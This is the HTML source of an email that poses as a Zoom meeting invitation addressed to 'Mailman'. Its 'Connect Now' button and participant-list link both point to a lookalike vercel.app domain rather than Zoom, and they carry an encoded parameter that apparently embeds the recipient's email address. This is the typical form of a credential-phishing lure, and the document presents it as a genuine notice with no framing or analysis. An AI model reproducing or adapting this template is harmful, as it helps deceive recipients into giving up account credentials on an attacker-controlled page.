<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <title>Meeting Invitation</title>
</head>

<body style="margin: 0; padding: 0;">
    <div style="max-width: 600px; margin: 0 auto; font-family: Arial, sans-serif;">
        <!-- Header -->
        <header style="background: #0b5cff; padding: 16px 32px;">
            <div style="font-family: 'Arial Rounded MT Bold', Arial, sans-serif; 
                        font-weight: 700; 
                        font-size: 22px; 
                        color: #ffffff;">
                <font size="5">ZOOM</font>
            </div>
        </header>

        <!-- Main Content -->
        <main style="padding: 32px; color: #131619;">
            <h1 style="font-size: 24px; margin: 0 0 24px 0; line-height: 1.3;">Your Scheduled Zoom Meeting Is About to Begin</h1>

            <p style="font-size: 16px; line-height: 1.5; margin: 0 0 20px 0;">
                Mailman,<br><br>
                Join the rest of your team for the upcoming Zoom meeting—connection information is listed below.</p>

            <div style="text-align: center; margin: 40px 0;">
                <a href="https://zoom-us-updlinkz80f-93webmail-hbb632jp6-linkschecked.vercel.app?XJ5K2NQ8P=K3J8VZ2P4XbWFpbG1hbkBvcGVuc3RyZWV0bWFwLm9yZwK3J8VZ2P4XK3J8VZ2P4X" style="background: #0b5cff; 
                          color: white; 
                          padding: 12px 40px; 
                          text-decoration: none; 
                          font-weight: bold;
                          display: inline-block;
                          font-size: 16px;" moz-do-not-send="true">
                    Connect Now</a>
            </div>

            <div style="font-size: 14px; color: #666; line-height: 1.5; border-top: 1px solid #eee; padding-top: 24px;">
                <p style="margin: 0 0 12px 0;">
                    <strong>Invitation details:</strong><br>
                </p>
                <p style="margin: 0 0 12px 0;">
                    • 2 persons are currently connected<br>• Expires in 30 days<br><br></p>

                <p style="margin: 0;">
                    <a href="https://zoom-us-updlinkz80f-93webmail-hbb632jp6-linkschecked.vercel.app?XJ5K2NQ8P=K3J8VZ2P4XbWFpbG1hbkBvcGVuc3RyZWV0bWFwLm9yZwK3J8VZ2P4XK3J8VZ2P4X" style="color: #0b5cff; text-decoration: none; font-weight: 500;" moz-do-not-send="true">
                        View participant list (2 Online) →
                    </a>
                </p>
            </div>
        </main>

        <!-- Footer -->
        <footer style="background: #f5f5f5; padding: 24px 32px; text-align: center; font-size: 12px; color: #666;">
            <p style="margin: 0 0 8px 0;">
                Zoom Video Communications • 55 Almaden Blvd, San Jose
            </p>
            <p style="margin: 0;">
                © 2025 All rights reserved • <a href="#" style="color: #666; text-decoration: none;">Privacy</a> | <a href="#" style="color: #666; text-decoration: none;">Terms</a>
            </p>
        </footer>
    </div>

</body>

</html>